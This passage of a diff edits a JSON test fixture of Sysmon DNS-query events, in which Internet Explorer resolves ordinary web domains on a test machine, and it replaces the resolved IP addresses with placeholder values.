Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029112900Z'/\u003e\u003cEventRecordID\u003e83\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.500\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eotf.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 iceotf-prod-fe-tm.trafficmanager.net;type: 5 iceotf-prod-fe-eastus.cloudapp.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -855,7 +855,7 @@ "version": 5, "time_created": "2019-07-18T03:34:03.029Z", "event_data": { - "QueryResults": "type: 5 iceotf-prod-fe-tm.trafficmanager.net;type: 5 iceotf-prod-fe-eastus.cloudapp.net;::ffff:40.114.54.223;", + "QueryResults": "type: 5 iceotf-prod-fe-tm.trafficmanager.net;type: 5 iceotf-prod-fe-eastus.cloudapp.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.500", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -949,7 +949,7 @@ { "@timestamp": "2021-05-05T15:30:51.695Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029126300Z'/\u003e\u003cEventRecordID\u003e84\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.580\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eping.chartbeat.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:35.171.101.225;::ffff:34.196.57.87;::ffff:34.194.164.46;::ffff:34.233.181.142;::ffff:34.194.167.169;::ffff:34.193.242.172;::ffff:34.234.152.11;::ffff:34.206.12.124;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029126300Z'/\u003e\u003cEventRecordID\u003e84\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.580\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eping.chartbeat.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -970,7 +970,7 @@ "ProcessId": "2736", "QueryName": "ping.chartbeat.net", "QueryStatus": "0", - "QueryResults": "::ffff:35.171.101.225;::ffff:34.196.57.87;::ffff:34.194.164.46;::ffff:34.233.181.142;::ffff:34.194.167.169;::ffff:34.193.242.172;::ffff:34.234.152.11;::ffff:34.206.12.124;", + "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "process": { @@ -1004,7 +1004,7 @@ "identifier": "S-1-5-18" }, "event_data": { - "QueryResults": "::ffff:151.101.194.79;::ffff:151.101.2.79;::ffff:151.101.66.79;::ffff:151.101.130.79;", + "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.628", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -1018,7 +1018,7 @@ "provider_guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029148500Z'/\u003e\u003cEventRecordID\u003e85\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.628\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eclarium.freetls.fastly.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:151.101.194.79;::ffff:151.101.2.79;::ffff:151.101.66.79;::ffff:151.101.130.79;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029148500Z'/\u003e\u003cEventRecordID\u003e85\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.628\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eclarium.freetls.fastly.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -1041,7 +1041,7 @@ "event_data": { "QueryName": "nym1-ib.adnxs.com", "QueryStatus": "0", - "QueryResults": "::ffff:68.67.178.252;::ffff:68.67.179.11;::ffff:68.67.179.228;::ffff:68.67.178.184;::ffff:204.13.192.141;::ffff:68.67.180.43;::ffff:68.67.179.23;::ffff:68.67.179.197;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;", + "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.633", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -1060,7 +1060,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029159100Z'/\u003e\u003cEventRecordID\u003e86\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.633\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003enym1-ib.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:68.67.178.252;::ffff:68.67.179.11;::ffff:68.67.179.228;::ffff:68.67.178.184;::ffff:204.13.192.141;::ffff:68.67.180.43;::ffff:68.67.179.23;::ffff:68.67.179.197;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029159100Z'/\u003e\u003cEventRecordID\u003e86\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.633\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003enym1-ib.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" } }, { @@ -1069,7 +1069,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029240500Z'/\u003e\u003cEventRecordID\u003e87\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.716\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eeb2.3lift.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 us-east-eb2.3lift.com;type: 5 dualstack.engagement-bus-prod-713264365.us-east-1.elb.amazonaws.com;::ffff:34.196.86.129;::ffff:34.233.250.110;::ffff:18.209.244.108;::ffff:34.224.204.11;::ffff:34.237.44.255;::ffff:3.210.231.21;::ffff:54.172.198.255;::ffff:34.199.186.227;192.5.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029240500Z'/\u003e\u003cEventRecordID\u003e87\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.716\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eeb2.3lift.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 us-east-eb2.3lift.com;type: 5 dualstack.engagement-bus-prod-713264365.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" }, "winlog": { "computer_name": "vagrant-2016", @@ -1082,7 +1082,7 @@ "ProcessId": "2736", "QueryName": "eb2.3lift.com", "QueryStatus": "0", - "QueryResults": "type: 5 us-east-eb2.3lift.com;type: 5 dualstack.engagement-bus-prod-713264365.us-east-1.elb.amazonaws.com;::ffff:34.196.86.129;::ffff:34.233.250.110;::ffff:18.209.244.108;::ffff:34.224.204.11;::ffff:34.237.44.255;::ffff:3.210.231.21;::ffff:54.172.198.255;::ffff:34.199.186.227;192.5.6.30;", + "QueryResults": "type: 5 us-east-eb2.3lift.com;type: 5 dualstack.engagement-bus-prod-713264365.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.716", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" @@ -1107,7 +1107,7 @@ "event": { "code": "22", "kind": "event", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029251400Z'/\u003e\u003cEventRecordID\u003e88\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.727\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epx.ads.linkedin.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 mix.linkedin.com;type: 5 any-na.mix.linkedin.com;::ffff:108.174.10.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029251400Z'/\u003e\u003cEventRecordID\u003e88\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.727\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epx.ads.linkedin.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 mix.linkedin.com;type: 5 any-na.mix.linkedin.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon" }, "winlog": { @@ -1127,7 +1127,7 @@ "event_data": { "QueryName": "px.ads.linkedin.com", "QueryStatus": "0", - "QueryResults": "type: 5 mix.linkedin.com;type: 5 any-na.mix.linkedin.com;::ffff:108.174.10.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;", + "QueryResults": "type: 5 mix.linkedin.com;type: 5 any-na.mix.linkedin.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.727", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -1153,7 +1153,7 @@ "winlog": { "time_created": "2019-07-18T03:34:03.029Z", "event_data": { - "QueryResults": "type: 5 login.msa.msidentity.com;type: 5 lgin.msa.trafficmanager.net;::ffff:40.90.23.239;::ffff:40.90.23.213;::ffff:40.90.23.154;", + "QueryResults": "type: 5 login.msa.msidentity.com;type: 5 lgin.msa.trafficmanager.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.733", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -1184,7 +1184,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029260200Z'/\u003e\u003cEventRecordID\u003e89\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.733\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003elogin.live.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 login.msa.msidentity.com;type: 5 lgin.msa.trafficmanager.net;::ffff:40.90.23.239;::ffff:40.90.23.213;::ffff:40.90.23.154;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated 